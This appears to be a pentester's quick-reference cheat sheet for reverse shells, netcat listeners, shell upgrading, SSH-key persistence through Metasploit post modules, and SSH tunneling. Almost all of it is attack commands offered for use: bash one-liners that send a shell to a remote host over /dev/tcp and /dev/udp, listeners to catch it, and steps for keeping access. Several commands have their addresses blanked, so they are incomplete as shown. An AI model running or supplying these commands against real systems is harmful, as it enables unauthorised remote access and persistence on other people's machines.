Reverse Shells and SSH


Bash TCP quick reference:
bash -i >& /dev/tcp/ 0>&1
0<&196;exec 196<>/dev/tcp/; sh <&196 >&196 2>&196
/bin/bash -l > /dev/tcp/ 0<&1 2>&1
Bash UDP quick reference:
sh -i >& /dev/udp/ 0>&1

Attack Box

Netcat TCP listener (local verbose numeric-ip port) on 4444
sudo nc -lvnp 4444
Netcat UDP listener
nc -u -lvp 4444
Terminal Upgrade (choose one)
python3 -c 'import pty;pty.spawn("/bin/bash")'
/usr/bin/script -qc /bin/bash /dev/null

Further terminal upgrading (clear, autocomplete, arrow key usage)

In the target machines' shell, enter:
export TERM=xterm
then press CTRL + Z to background your hosts' shell, followed by:
stty raw -echo; fg
stty raw -echo; fg - transfers the raw characters rather than waiting for you to press return, fg brings the reverse shell to the foreground.

SSH persistence

Metasploit has the following two post modules:
Linux: post/linux/manage/sshkey_persistence
Windows: post/windows/manage/install_ssh

SSH Tunneling

If you are able to SSH into a device, but unable to connect to another port (for example, port 5555 on android devices), you can port forward, resulting in the traffic using an ssh tunnel.
The following example listens (-L) to traffic on port 5555 locally, sends it through the SSH tunnel, before releasing it to port 5555, on the remote machine.
ssh -L 5555: -p ssh_port [email protected]
Then, when you execute the following command (in another terminal), all traffic will be forwarded over ssh to the remote device.
adb connect
SSH Tunneling also works for web browsing, just switch up the ports and proxy settings!

Interactive Windows Shell

Interactive shell from Unix to Windows using rlwrap. Execute the following command on the Unix box.
sudo rlwrap nc -lvnp [port]